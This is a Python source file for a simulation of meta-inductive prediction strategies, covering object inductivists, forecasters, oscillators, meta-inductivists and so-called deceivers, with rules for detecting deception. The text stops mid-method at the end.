"""The world class contains all global variables such as the
lists of predictor strategies, the number of the current round
etc.
Attributes:
round - round number
event - the next event to take place
absFrequency - absolute frequency of the event 1
relFrequency - relative frequency of the event 1
miList - list of predictors that are meta inductivists
non_miList - list of predictors that are not meta
inductivists
miMean - average success rate of all MIs
non_miMean - average success rate of all non MIs
favN - dictionary that records for each strategy the
number of rounds when it is being observed by
any MI
absucc - dictionary that counts the absolute success
of each strategies when it is being observed
by any MI
deceivers - list of deceivers (updated after each round before the
analyse-methods are called)
nondeceivers - list of nondeceivers (updated after each round before the
analyse-methods are called)
ultdeceivers - list of three times out deceivers
nonultdeceivers - list of non three times out deceivers
alldeceivers - list of deceivers and ultdeceivers
nonalldeceivers - list of non alldeceivers
favlist - list of favorites (updated after each round before the
analyse-methods are called)
worldDeceived - A variable taking as its values the predictor that
is deceived by the world (the world can only deceive one
predictor at a time) or None, if there is no world
deception. """
def __init__(self, eventFunction = lambda : getRandomEvent(2.0/3.0)):
self.getEvent = eventFunction
self.round = 0
self.event = 0
self.absFrequency = 0
self.relFrequency = 0.0
self.predictorList = []
self.miList = []
self.non_miList = []
self.miMean = 0.0
self.non_miMean = 0.0
self.deceivers = []
self.nondeceivers = []
self.ultdeceivers = []
self.alldeceivers = []
self.nonalldeceivers = []
self.nonultdeceivers = []
self.favN = {}
self.absucc = {}
self.favlist = []
self.deceiveCount = {}
self.deceiveState = {}
self.worldDeceived = None
def register(self, predictor):
"""Add another predictor strategy. Make sure that meta
inductivists will always be last in the predictor list.
This method is run only once per predictor, before the simulation starts."""
assert self.round == 0, "Simulation is already running: " + \
"Predictors can not be added any more!"
if isinstance(predictor, MetaInductivist):
self.miList.append(predictor)
else:
self.non_miList.append(predictor)
self.favN[predictor.name] = 0
self.absucc[predictor.name] = 0
self.nonultdeceivers.append(predictor)
self.deceiveCount[predictor.name] = 0
self.deceiveState[predictor.name] = False
predictor.registeredBy(self)
#print str(predictor)
def getPredictorList(self):
"""-> list of all registered predictors, MIs and non MIs"""
return self.non_miList + self.miList
def nextRound(self):
"""Generate a new event. Let the predictors make their
predictions and evaluate their predictions, i.e. update
the variables storing the absolute success rate as well
as the relative success rate. Update the event frequency
rates. Finally, call the predictors' analyse method.
"""
self.round += 1
if self.worldDeceived:
if isinstance(self.worldDeceived.fav, ObjectInductivist):
if self.relFrequency > 0.5:
self.event = 0
elif self.relFrequency < 0.5:
self.event = 1
else:
self.event = getRandomEvent(0.5)
elif self.worldDeceived.fav == None:
self.event = getRandomEvent(0.5)
else: self.event = self.getEvent()
# if worldDeceived and it is round 1, getRandomEvent(0.5) is used in any case
else:
self.event = self.getEvent()
# the non-MIs predict first, only then the MIs, because
# the MIs fall back on the predictions of the non-MIs
for predictor in self.non_miList + self.miList:
e = predictor.predict()
if e == self.event: predictor.success += 1
predictor.successRate = predictor.success / float(self.round)
if self.event == 1: self.absFrequency += 1
self.relFrequency = self.absFrequency / float(self.round)
if self.miList:
self.miMean = sum([p.successRate for p in self.miList]) / \
len(self.miList)
if self.non_miList:
self.non_miMean = sum([p.successRate for p in self.non_miList]) / \
len(self.non_miList)
# analyse is called for the MIs first, only then for the non-MIs,
# because the non-MIs need to know whether they are favorites.
self.updateControlDictionaries()
for predictor in self.miList + self.non_miList:
predictor.analyse()
def updateControlDictionaries(self):
self.favlist = [m.fav for m in self.miList]
self.deceivers = []
self.nondeceivers = []
for p in self.non_miList:
if p in self.favlist:
self.favN[p.name] += 1
if p.prediction == self.event:
self.absucc[p.name] += 1
if self.deceived(p):
self.deceivers.append(p)
else:
self.nondeceivers.append(p)
for p in self.nonultdeceivers[:]: # iterate over a copy; the list is modified below
if self.ultdeceived(p):
self.ultdeceivers.append(p)
self.nonultdeceivers.remove(p)
self.alldeceivers = list(set(self.deceivers).union(set(self.ultdeceivers)))
self.nonalldeceivers = [x for x in self.non_miList \
if not x in self.alldeceivers]
# Global deception detection, in class World.
# absucc is the absolute success of a while a was favorite;
# success is the overall absolute success of a.
def _deceptionRule(self, round, n, absucc, success):
if n <= 5:
return False
condSuccRate = absucc / float(n)
if hardrule:
if (round - n) <= 5: return False
invSuccRate = float(success - absucc) / float(round - n)
return invSuccRate > condSuccRate + epsilonD
else:
succRate = success / float(round)
return (succRate > condSuccRate + epsilonD or succRate < epsilonD)
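# Worked example for the soft rule (assumed numbers, epsilonD = 0.04):
# after round = 100 with n = 20 rounds as favorite, absucc = 10 and
# success = 70, we get condSuccRate = 0.5 and succRate = 0.7; since
# 0.7 > 0.5 + 0.04, the strategy counts as a deceiver.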
# succRate is recomputed here because it is also needed by the
# future_* applications below. The or-condition is new!
# Global future-deceived functions:
# if the non-MI predicted correctly the next time, it would count as a
# global deceiver. Only evaluated while a is a favorite.
def future_deceivedup(self, a):
return self._deceptionRule(self.round+1,
self.favN[a.name],
self.absucc[a.name],
a.success+1)
def future_deceiveddown(self, a):
return self._deceptionRule(self.round+1,
self.favN[a.name]+1,
self.absucc[a.name],
a.success)
def deceived(self, a):
return self._deceptionRule(self.round,
self.favN[a.name],
self.absucc[a.name],
a.success)
def ultdeceived(self, a):
if self.deceiveCount[a.name] >= 3:
return True
else:
if self.deceived(a):
if not self.deceiveState[a.name]:
self.deceiveCount[a.name] += 1
self.deceiveState[a.name] = True
else:
self.deceiveState[a.name] = False
return False
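# Sketch of the "three times out" rule implemented above: each transition
# from the non-deceived to the deceived state increments deceiveCount; once
# a strategy has been caught deceiving three times, it is classified as an
# ultimate deceiver permanently.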
########################################################################
#
# Predictor classes
#
########################################################################
# For compatibility reasons (jython), "old style" classes are used here,
# i.e. classes that are not derived from "object". Otherwise, from
# Python 2.2 onwards, "new style" classes would be preferable, i.e.
# "class Predictor(object):". This has no effect on how the program
# works, though!
class Predictor:
"""Template for a prediction strategy.
Attributes:
name - predictor's name
short - predictor's short name
suffix - a suffix number to the predictor's name in
order to tell different predictors apart
world - a reference to the world object this predictor
belongs to
success - absolute number of correct predictions
successRate - average rate of correct predictions so far
prediction - prediction made in the current round
(only after method predict has been called)
"""
def __str__(self):
if self.suffix >= 1: return self.name+" "+str(self.suffix)
else: return self.name
def __init__(self, name):
self.name = name
self.short = ""
self.suffix = 0
self.world = None
self.success = 0
self.successRate = 0.0
self.prediction = 0
def shortName(self, length = 3):
"""Returns an abbreviated name of 'length' characters"""
if len(self.short) == length: return self.short
s = str(self)
if len(s) < length:
self.short = s + " "*(length-len(s))
return self.short
r = []; alphaNum = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for ch in s:
if ch in alphaNum:
r.append(ch)
elif ch in ", ": alphaNum = alphaNum + "0123456789"
elif ch == ".":
del r[-1]
alphaNum = alphaNum[:26]
r = r[:length]
if len(r) < length: r.extend([" "]*(length-len(r)))
if self.suffix >= 1: r[-1] = str(self.suffix)[-1]
self.short = "".join(r)
return self.short
def _determineSuffix(self):
l = [p for p in self.world.getPredictorList() \
if p.name == self.name and p != self]
if l:
if l[-1].suffix == 0: l[-1].suffix = 1
self.suffix = l[-1].suffix + 1
self.short = ""; l[-1].short = ""
def registeredBy(self, world):
"""Associates predictor with a world-object."""
self.world = world
self._determineSuffix()
self.short = ""
self.short = self.shortName(3)
def predict(self):
"""Predict the next event."""
raise NotImplementedError
def analyse(self):
"""Possible analysis of results after the prediction cycle
is finished.
"""
pass
def bestOf(predictorList):
"""Return the most succesful predictor(s) of the list. The
return value is a list of one or more predictors. The latter
is the case if there are several equally good best predictors
in the list.
"""
assert predictorList != [], "Predictor list is empty!"
bestList = []
bestRate = -1.0
for p in predictorList:
if p.successRate > bestRate:
bestList = [p]
bestRate = p.successRate
elif p.successRate == bestRate:
bestList.append(p)
return bestList
def worstOf(predictorList):
"""Return the least succesful predictor(s) of the list. The
return value is a list of one or more predictors. The latter
is the case if there are several equally bad worst predictors
in the list.
"""
assert predictorList != [], "Predictor list is empty!"
worstList = []
worstRate = 2.0
for p in predictorList:
if p.successRate < worstRate:
worstList = [p]
worstRate = p.successRate
elif p.successRate == worstRate:
worstList.append(p)
return worstList
########################################################################
#
# Random Guess
#
########################################################################
""" Hinweis: da RandomGuess als fallback-Strategie für jeden MI separat
durchgeführt wird, dard dieser RandomGuess nur verwendet werden, wenn
worldDeceived None ist"""
class RandomGuess(Predictor):
"""Random Guess Strategy."""
def __init__(self, name = "Random Guess"):
Predictor.__init__(self, name)
def predict(self):
self.prediction = getRandomEvent(0.5)
return self.prediction
########################################################################
#
# Object Inductivist
#
########################################################################
class ObjectInductivist(Predictor):
"""Object inductivist strategy."""
def __init__(self, name = "Object Inductivist"):
Predictor.__init__(self, name)
self.prediction = getRandomEvent()
def predict(self):
if self.world.worldDeceived and (self.world.round == 1\
or self.world.relFrequency == 0.5):
self.prediction = invertEvent(self.world.event)
# in this case the prediction is overwritten. self.world.relFrequency is
# still set to its old value. Whenever OI is called it is a player anyway,
# and is therefore the MI favorite in the first round.
return self.prediction
def analyse(self):
if self.world.relFrequency > 0.5: self.prediction = 1
elif self.world.relFrequency < 0.5: self.prediction = 0
else: self.prediction = getRandomEvent(0.5)
########################################################################
#
# Forecaster
#
########################################################################
class Forecaster(Predictor):
"""A prediction strategy that is successfull at a predifined rate.
Attributes:
successAim - the predifined success rate this
Forecaster shall reach
"""
def __init__(self, successAim, name="Forecaster"):
Predictor.__init__(self, name + " %.2f" % successAim)
self.successAim = successAim
def predict(self):
        if randomBool(self.successAim):  # randomBool(x) returns 1 with probability x, else 0
self.prediction = self.world.event
else:
self.prediction = invertEvent(self.world.event)
return self.prediction
class ForecasterFromBottom(Predictor):
"""A prediction strategy that is successfull at a predifined rate.
Attributes:
successAim - the predifined success rate this
Forecaster shall reach
"""
def __init__(self, successAim, name="Forecaster"):
Predictor.__init__(self, name + " %.2f" % successAim)
self.successAim = successAim
def predict(self):
        if randomBool(self.successAim) and self.world.round > 70:
            # randomBool(x) returns 1 with probability x, else 0
self.prediction = self.world.event
else:
self.prediction = invertEvent(self.world.event)
return self.prediction
class DelayedForecaster(Forecaster):
"""A prediction strategy that is successfull at a predifined rate
only after a certain while; random success before that while.
Attributes:
successAim - the predifined success rate this
Forecaster shall reach
delay - number of rounds until sucess increases
"""
def __init__(self, successAim, delay, name="Forecaster"):
Predictor.__init__(self, name + " %.2f; %i" % (successAim,delay))
self.successAim = successAim
self.delay = delay
def predict(self):
if self.delay > 0:
self.delay -= 1
self.prediction = getRandomEvent(0.5)
else:
self.prediction = Forecaster.predict(self)
return self.prediction
########################################################################
#
# Oscillator
#
########################################################################
OSC_UP = "up"
OSC_DOWN = "down"
OSC_WAITTOP = "waitTop"
OSC_WAITBOTTOM = "waitBottom"
class Oscillator(Predictor):
"""Abstract base class for all oscillator classess.
Attributes:
phase - tells whether this oscillator is presently
going up or down; can take the value of one
of the above defined constants
"""
def __init__(self, name):
Predictor.__init__(self, name)
self.phase = OSC_UP
def predict(self):
if self.phase == OSC_UP: self.prediction = self.world.event
else: self.prediction = invertEvent(self.world.event)
return self.prediction
def analyse(self):
raise NotImplementedError
class AmplitudeOscillator(Oscillator):
"""Success oscillates between predefined rates.
Attributes:
min - minimal success rate value
max - maximal success rate value
"""
def __init__(self, minv, maxv, name = "Amplitude Oscillator"):
"""Succes rate oscillates between min and max."""
Oscillator.__init__(self, name + " %.2f, %.2f" % (minv, maxv))
if minv > maxv:
x = maxv; maxv = minv; minv = x
self.min = minv
self.max = maxv
def analyse(self):
if self.successRate > self.max: self.phase = OSC_DOWN
elif self.successRate < self.min: self.phase = OSC_UP
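# Hedged behavioral sketch: an AmplitudeOscillator(0.4, 0.6) predicts
# correctly (phase "up") until its success rate exceeds 0.6, then predicts
# incorrectly (phase "down") until the rate drops below 0.4, so that its
# success rate saws back and forth between the two bounds.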
class PeriodOscillator(Oscillator):
"""An oscillator with a fixed period but (necessarily)
diminishing amplitude.
Attributes:
halfperiod - half the period length in rounds
shift - phase shift in rounds
"""
def __init__(self, halfperiod, shift, name = "Period Oscillator"):
Oscillator.__init__(self, name)
self.name = name + " " + str(halfperiod) + " " + str(shift)
self.halfperiod = halfperiod
self.shift = shift % (2*halfperiod)
if self.shift >= halfperiod: self.phase = OSC_DOWN
else: self.phase = OSC_UP
def analyse(self):
s = (self.world.round+self.shift) % (2*self.halfperiod)
if s >= self.halfperiod: self.phase = OSC_DOWN
else: self.phase = OSC_UP
class CoupledOscillator(AmplitudeOscillator):
"""Oscillator that is connected to another oscillator of the
same kind, but opposite phase.
Attributes:
combo - the other oscillator that this one is
combined with
"""
def __init__(self, min, max, name = "Coupled Oscillator"):
AmplitudeOscillator.__init__(self, min, max, name)
self.combo = None
def registeredBy(self, world):
AmplitudeOscillator.registeredBy(self, world)
for predictor in self.world.non_miList:
if isinstance(predictor, CoupledOscillator) and \
predictor != self:
self.combo = predictor
self.combo.combo = self
if self.phase == self.combo.phase:
if self.phase == OSC_UP: self.phase = OSC_DOWN
else: self.phase = OSC_UP
break
def predict(self):
if self.phase == OSC_UP:
self.prediction = self.world.event
elif self.phase == OSC_DOWN:
self.prediction = invertEvent(self.world.event)
elif self.phase == OSC_WAITTOP:
if randomBool(self.max): self.prediction=self.world.event
else: self.prediction = invertEvent(self.world.event)
else: # self.phase == "waitBottom"
if randomBool(self.min): self.prediction=self.world.event
else: self.prediction = invertEvent(self.world.event)
return self.prediction
def analyse(self):
if self.phase == OSC_UP and self.successRate > self.max:
self.phase = OSC_WAITTOP
elif self.phase == OSC_DOWN and self.successRate < self.min:
self.phase = OSC_WAITBOTTOM
if self.phase == OSC_WAITTOP:
if self.combo.phase != OSC_DOWN: self.phase = OSC_DOWN #else do nothing
elif self.phase == OSC_WAITBOTTOM:
if self.combo.phase != OSC_UP: self.phase = OSC_UP
class OscDelayedForecaster(Forecaster, AmplitudeOscillator):
"""Forecaster that acts like an Amplitude Oscillator
in the beginning (for a given number of phases), before
it acts like a Forecaster.
Attributes:
phaseLimit - the number of half phase changes until
its behavior changes from an amplitude oscillator
to a Forecaster
        phaseCounter - the actual number of half phase changes
oscState - the state (up or down) of the current
phase
    Note: the parameter maxPhases of the constructor __init__
    takes the number of full phases, while the object variables
    phaseLimit and phaseCounter use half phases!
"""
def __init__(self, minv, maxv, maxPhases, successAim,
name = "OscDelayedForecaster"):
Forecaster.__init__(self, successAim, name)
AmplitudeOscillator.__init__(self, minv, maxv, name)
self.phaseLimit = maxPhases*2
self.phaseCounter = 0
self.oscState = self.phase
def predict(self):
if self.phaseCounter < self.phaseLimit:
return AmplitudeOscillator.predict(self)
else: return Forecaster.predict(self)
def analyse(self):
if self.phaseCounter < self.phaseLimit:
AmplitudeOscillator.analyse(self)
else: Forecaster.analyse(self)
if self.oscState != self.phase:
self.phaseCounter += 1
self.oscState = self.phase
########################################################################
#
# Meta-Inductivists
#
########################################################################
class MetaInductivist(Predictor):
"""Follow the most successful strategy so far.
Attributes:
fav - the current favorite of the meta inductivist
"""
def __init__(self, name = "Meta Inductivist"):
Predictor.__init__(self, name)
self.fav = None
def registeredBy(self, world):
Predictor.registeredBy(self, world)
self.fav = None
def predict(self):
if self.fav:
self.prediction = self.fav.prediction
elif self.world.round == 1 and not(self.world.worldDeceived == self):
for p in self.world.non_miList:
if isinstance(p, ObjectInductivist):
self.prediction = p.prediction
break
else:
self.prediction = getRandomEvent()
else:
if self.world.worldDeceived == self:
self.prediction = invertEvent(self.world.event)
else:
self.prediction = getRandomEvent()
return self.prediction
    # self.world.non_miList = list of all predictors that are not MIs
    # bestOf(list) returns the list of the best strategies
    # choice(list) picks one element among the equally good ones
    # still to be introduced: alphchoice, randchoice
def analyse(self):
best = choice(bestOf(self.world.non_miList))
if self.fav == None or \
best.successRate > self.fav.successRate: self.fav = best
class EpsilonMetaInductivist(MetaInductivist):
"""Meta inductivist that picks a new strategy only
if it is more than a little bit better than its old favorite.
"""
def __init__(self, name="Epsilon Meta Inductivist"):
MetaInductivist.__init__(self, name)
# "%.3f" gibt Format der Zahl nach dem % an. .3Fliesskomma
def analyse(self):
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None or \
candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
###################################################################
#### This class is only needed for local deception detection,
#### i.e. for the local avoidance MI
####################################################################
class DeceptionDetectionMixin(MetaInductivist):
"""A Mixin class that implements the local "deceived"-function.
Attributes:
        control - a dictionary of pairs [a, b], indexed by the names of the
            non-MI strategies (possible deceivers), recording the number of
            times this MI has put on each of them (a) as well as the number
            of successes this MI had while putting on that strategy (b).
"""
def __init__(self):
self.control = {}
def _registered(self):
for p in self.world.non_miList:
self.control[p.name] = [0, 0]
    # Local deception detection, separately for each MI; this class is
    # derived from MI and only used by the avoidance MI so far.
    # At most relevant for the future.
def succ(self, a):
"""Return the relative success of 'a' while MI has put on 'a'."""
n, absucc = self.control[a.name]
if n == 0: return 0.0
else: return float(absucc) / float(n)
def nsucc(self, a):
"""Return the relative success of 'a' while MI has not put on 'a'."""
n, absucc = self.control[a.name]
if self.world.round == n: return 0.0
else: return float(a.success - absucc) / float(self.world.round - n)
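    # Hedged worked example for succ()/nsucc() with invented numbers: if this
    # MI has put on strategy a in n = 10 of 50 rounds with 4 successes
    # (control[a.name] == [10, 4]) and a succeeded 30 times in total, then
    # succ(a) == 4/10 == 0.4 while nsucc(a) == (30 - 4)/(50 - 10) == 0.65,
    # i.e. a performs notably worse exactly when this MI puts on it.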
def deceived(self, a):
"""return True if MI seems to have been deceived by 'a'.
"""
try:
n = self.control[a.name][0]
if hardrule:
return self.nsucc(a) > self.succ(a) + epsilonD and \
(n > 5) and ((self.world.round - n) > 5)
else:
return (n > 5) and ( (a.successRate > self.succ(a) + epsilonD) or \
(a.successRate < epsilonD))
except KeyError:
            raise AssertionError(str(a) + " is not a non-MI!")
def future_deceiveddown(self, a):
"""return True if MI seems to have been deceived by 'a', if
a cheats in the next round.
"""
nfav, succfav = self.control[a.name]
#f_n = n+1;
# f_worldround = self.world.round+1
f_successRate = float(a.success) / float(self.world.round+1)
f_successRatefav = float(succfav) / float(nfav+1)
if hardrule:
return self.nsucc(a) > (f_successRatefav + epsilonD) and \
(nfav+1 > 5) and ((self.world.round - nfav) > 5)
else:
return nfav+1 > 5 and (f_successRate > f_successRatefav + epsilonD \
or f_successRate < epsilonD)
def future_deceivedup(self, a):
"""return True if MI seems to have been deceived by 'a', if
a cheats in the next round.
"""
nfav, succfav = self.control[a.name]
#f_n = n+1;
# f_worldround = self.world.round+1
f_successRate = float(a.success +1) / float(self.world.round+1)
if hardrule:
return (nfav+1 > 5) and ((self.world.round - nfav) > 5) and \
float(a.success+1-succfav)/(self.world.round+1 - nfav) > \
(float(succfav)/nfav) + epsilonD
else:
return nfav > 5 and (f_successRate > (float(succfav)/nfav) + epsilonD \
or f_successRate < epsilonD)
def _analyse(self):
if self.fav in self.world.non_miList:
self.control[self.fav.name][0] += 1
if self.fav.prediction == self.world.event:
self.control[self.fav.name][1] += 1
## def predict(self):
## if self.world.randomGuessFlag:
## if deceivedOI:
## self.prediction = invertEvent(self.world.event)
## else:
## self.prediction = getRandomEvent(p = 0.5)
## else:
## self.prediction = self.fav.prediction
## return self.prediction
#####################################
### Avoidance MIs ###
#####################################
class LocAvoidMI(EpsilonMetaInductivist, DeceptionDetectionMixin):
def __init__(self, name="LocAvoidMI"):
DeceptionDetectionMixin.__init__(self)
EpsilonMetaInductivist.__init__(self, name)
def registeredBy(self, world):
EpsilonMetaInductivist.registeredBy(self, world)
# DeceptionDetectionMixin._registered(self)
def predict(self):
if self.world.round == 1:
DeceptionDetectionMixin._registered(self)
return EpsilonMetaInductivist.predict(self)
def analyse(self):
DeceptionDetectionMixin._analyse(self)
if (self.world.round % 100) < 5:
            # gives a new chance 5 times every 100 rounds
            # Note: this does not help against all deceivers, since the aMI
            # only puts on the best one anyway
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
agList = self.world.non_miList[:]
while agList != []:
F = choice(bestOf(agList))
if self.deceived(F): agList.remove(F)
else: break
if agList != []:
if self.fav not in agList or \
(F.successRate > self.fav.successRate + epsilon):
self.fav = F
else: self.fav = None
# Changes:
# deception recording only starts after n=5 rounds...
# SoftDecRec: |Succ(Ai,n) - Succ(Ai,n | MIj puts on Ai)| > epsilon
#   keeps giving Ai another chance, because the number of rounds in which
#   MIj puts on Ai becomes vanishingly small compared to the rounds where
#   this is not the case, and therefore drowns in the quotient
# HardDecRec: |Succ(Ai,n | not MIj puts on Ai) - Succ(Ai,n | MIj puts on Ai)| > epsilon
class AvoidMI(EpsilonMetaInductivist):
def __init__(self, name="AvoidMI"):
EpsilonMetaInductivist.__init__(self, name)
def registeredBy(self, world):
EpsilonMetaInductivist.registeredBy(self, world)
def analyse(self):
        # plays like PunishMIColl when not neutralizing,
        # except that it keeps giving deceivers a new chance
if (self.world.round % 100) < 0:
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.world.nondeceivers != []:
bestAg = choice(bestOf(self.world.nondeceivers))
if self.fav not in self.world.nondeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
            else: pass
else:
self.fav = None
class UltAvoidMI(EpsilonMetaInductivist):
def __init__(self, name="AvoidMI"):
EpsilonMetaInductivist.__init__(self, name)
def registeredBy(self, world):
EpsilonMetaInductivist.registeredBy(self, world)
def analyse(self):
        # plays like PunishMIColl when not neutralizing,
        # except that it keeps giving deceivers a new chance
if (self.world.round % 100) < 0:
candidate = choice(bestOf(self.world.non_miList))
if self.fav == None \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.world.nonalldeceivers != []:
bestAg = choice(bestOf(self.world.nonalldeceivers))
if self.fav not in self.world.nonalldeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
            else: pass
else:
self.fav = None
###################################################################
### class CollectiveMI
## The superclass of the collectively organized MIs; they number themselves.
#####################################################################
class CollectiveMI(EpsilonMetaInductivist):
"""Abstract base class for collective meta inductivist strategies.
    Collective meta inductivists are prediction strategies that work
    together as a coordinated group.
Attributes:
order - the order number of the meta inductivist, e.g.
if this MI is MI3 then order will be 3
cmiList - a list of the other collective meta inductivists
(of the same class) in the world with a lower order
"""
def __init__(self, name = "Collective Meta Inductivist"):
EpsilonMetaInductivist.__init__(self, name)
self.order = 1
self.cmiList = []
def registeredBy(self, world):
for p in world.miList:
if isinstance(p, self.__class__) and p != self:
self.order += 1
self.cmiList.append(p)
# self.name = self.name + " " + str(self.order)
EpsilonMetaInductivist.registeredBy(self, world)
def analyse(self):
raise NotImplementedError
###################################################################
####### The inverted MIColls, which can put negatively on other MIs
#####################################################################
class InvertMIColl(CollectiveMI):
"""This meta inductivist uses other meta inductivists with small success as a
negatively correlated source for his own predictions.
Attributes:
invert - boolean flag that indicates whether this meta
inductivist puts negatively or positively
on its favorite
"""
def __init__(self, name = "InvertMIColl"):
CollectiveMI.__init__(self, name)
self.invert = False
def predict(self):
if self.fav:
if self.invert:
self.prediction = invertEvent(self.fav.prediction)
else: self.prediction = self.fav.prediction
        else:  # no fav only in the first round
if self.world.worldDeceived == self:
self.prediction = invertEvent(self.world.event)
else:
self.prediction = getRandomEvent(0.5)
return self.prediction
def analyse(self):
if self.order == 1:
EpsilonMetaInductivist.analyse(self)
else:
best_nonMI = choice(bestOf(self.world.non_miList))
worstMI = choice(worstOf(self.cmiList))
if best_nonMI.successRate >= 1.0 - worstMI.successRate + epsilon:
self.fav = best_nonMI
self.invert = False
else:
#self.fav = worstMI
self.fav = worstMI.fav
# self.invert = not worstMI.invert
self.invert = True
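# Hedged worked example of the decision rule above (rates invented): if the
# best non-MI scores 0.55 while the worst collective MI scores only 0.3,
# inverting that MI's favorite promises about 1.0 - 0.3 = 0.7 accuracy,
# which beats 0.55 + epsilon, so this MI sets invert = True; otherwise it
# simply follows the best non-MI.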
###############################################################
###### The neutralizing MIColls -- the comments still say "punish"
####### instead of "neutralize" -- with deception detection.
###################################################################
class PunishMIColl(CollectiveMI):#, DeceptionDetectionMixin):
"""A collective defense which uses global deception dection to
protect itself. The MIs "punish" the decivers, or better neutralize
them, by putting on the deceivers in a 1:1 manner as long as they deceiver.
The MIs not needed for neutralization/punishment act like ordinary eMIs.
"""
def __init__(self, name="Punish"):
# DeceptionDetectionMixin.__init__(self)
CollectiveMI.__init__(self, name)
def registeredBy(self, world):
CollectiveMI.registeredBy(self, world)
# DeceptionDetectionMixin._registered(self)
# MetaInductivist.registeredBy(self, world)
def analyse(self):
if self.world.round < 10:
candidate = choice(bestOf(self.world.non_miList))
if not self.fav or \
candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.order <= len(self.world.deceivers):
self.fav = self.world.deceivers[self.order-1]
            # element indexing starts at zero
else:
if self.world.nondeceivers != []:
bestAg = choice(bestOf(self.world.nondeceivers))
if self.fav not in self.world.nondeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
                else: pass
else:
self.fav = None
class UltPunishMIColl(PunishMIColl):
"""Like PunishMIColl, but if a deceiver has changed his deception status by
at least three times, he will be recorded as a deceiver forever (he is then
a so-called ultimate deceiver).
"""
def __init__(self, name = "UltPunishMIColl"):
PunishMIColl.__init__(self, name)
def analyse(self):
if self.world.round < 10:
candidate = choice(bestOf(self.world.non_miList))
if not self.fav \
or candidate.successRate > self.fav.successRate + epsilon:
self.fav = candidate
return
if self.order <= len(self.world.alldeceivers):
self.fav = self.world.alldeceivers[self.order-1]
            # element indexing starts at zero
else:
if self.world.nonalldeceivers != []:
bestAg = choice(bestOf(self.world.nonalldeceivers))
if self.fav not in self.world.nonalldeceivers:
self.fav = bestAg
elif bestAg.successRate > (self.fav.successRate + epsilon):
self.fav = bestAg
                else: pass
else:
self.fav = None
#################################################################
### Collective Weighted Average Meta-Inductivist.
### The MIs of this kind no longer have a favorite.
### Therefore a special predict function has to be defined, too.
##################################################################
class WeightAv(Predictor):
def __init__(self, name="WeightAv"):
Predictor.__init__(self, name)
self.idealabsucc = 0.0
self.idealsuccessRate = 0.0
self.attDict = {}
self.idealprediction = 0.5
def registeredBy(self, world):
Predictor.registeredBy(self, world)
# MetaInductivist.registeredBy(self, world)
# def order(self, p):
# return self.world.non_miList.index(p)
    # createAttDict is a function (without parameters), to be distinguished
    # from the value of the attribute attDict
def createAttDict(self):
self.attDict = {}
self.idealabsucc += (1 - abs(self.world.event - self.idealprediction ))
self.idealsuccessRate = (self.idealabsucc/self.world.round)
for p in self.world.non_miList:
order = self.world.non_miList.index(p)
value = p.successRate - self.idealsuccessRate
# self.attDict['p.name'] = value
self.attDict[order] = value
return self.attDict
def idealpred(self):
if self.world.miList.index(self) > 0:
self.idealprediction = self.world.miList[0].idealprediction
return self.idealprediction
            # not recomputed for WeightAvMIColl with order > 1
if self.world.round <= 1:
idealprediction = 0.5
        else:
            numerator = 0.0
            denominator = 0.0
            for p in self.world.non_miList:
                # order = self.order(p)
                order = self.world.non_miList.index(p)
                if self.attDict[order] > 0:
                    # denominator = denominator + self.attDict[p.name]
                    denominator = denominator + self.attDict[order]
                    if p.prediction == 1:
                        numerator = numerator + self.attDict[order]
                    # numerator = numerator + self.attDict[p.name]
            if denominator == 0:
                idealprediction = 0.5
            else:
                idealprediction = numerator / denominator
self.idealprediction = idealprediction
return self.idealprediction
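    # Hedged worked example of idealpred() with invented numbers: suppose the
    # attractiveness values (successRate - idealsuccessRate) of three non-MI
    # players are 0.2, 0.1 and -0.3.  Only the positive ones count; if the
    # first predicts 1 and the second predicts 0, then
    # idealprediction = 0.2 / (0.2 + 0.1) = 2/3, a lean towards event 1.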
def analyse(self):
if self.world.miList.index(self) == 0:
self.createAttDict()
else:
self.attDict = self.world.miList[0].attDict
        # computes attDict only once, for the first WeightAvMIColl
class WeightAvMIColl(WeightAv, CollectiveMI):
def __init__(self, name="WeightAvMIColl"):
WeightAv.__init__(self, name)
CollectiveMI.__init__(self, name)
def registeredBy(self, world):
WeightAv.registeredBy(self, world)
CollectiveMI.registeredBy(self, world)
# MetaInductivist.registeredBy(self, world)
def predict(self):
idealprediction = self.idealpred()
miNumber = len(self.world.miList)
miPosNumber = round(miNumber * idealprediction)
order = self.world.miList.index(self)
# if order == 0: print idealprediction
if (order + 1) <= (miNumber - miPosNumber):
self.prediction = 0
else:
self.prediction = 1
return self.prediction
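# Hedged sketch of the collective prediction above: with 10 collective MIs
# and idealprediction == 0.7, round(10 * 0.7) == 7 MIs predict 1 while the
# three lowest-order MIs predict 0, approximating the ideal weighted-average
# prediction as closely as whole predictors allow.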
########################################################################
#
# Deceivers
#
########################################################################
AG_SUCCEED = "succeed"
AG_FAIL = "fail"
class Deceiver(Predictor):
"""Abstract base class for all deceivers. Deceiverss are predictors that
try to lead meta inductivists into failure by predicting
badly when they are favorites.
Attributes:
state - indicates whether this deceiver will make succeeding
or failing predictions; can take the value of one
of the above defined constants: AG_XX
"""
def __init__(self, name = "Deceiver"):
Predictor.__init__(self, name)
self.state = AG_SUCCEED
def predict(self):
if self.state == AG_SUCCEED: self.prediction = self.world.event
else: self.prediction = invertEvent(self.world.event)
return self.prediction
def analyse(self):
raise NotImplementedError
class SystOscillator(Deceiver):
"""This forecaster is not a proper deceiver, but acts similar to a deceiver.
It tries to get ahead of all other strategies and then
conciously falls back in order to lead a meta-inductivist astray.
It oscillates systematically independent of which other
on-MI-players are present."""
def __init__(self, name="Systematic Oscillator"):
Deceiver.__init__(self, name)
self.miFav = None
def registeredBy(self, world):
Deceiver.registeredBy(self, world)
self.miFav = None
def predict(self):
return Deceiver.predict(self)
def analyse(self):
best = choice(bestOf(self.world.non_miList))
if not self.miFav or \
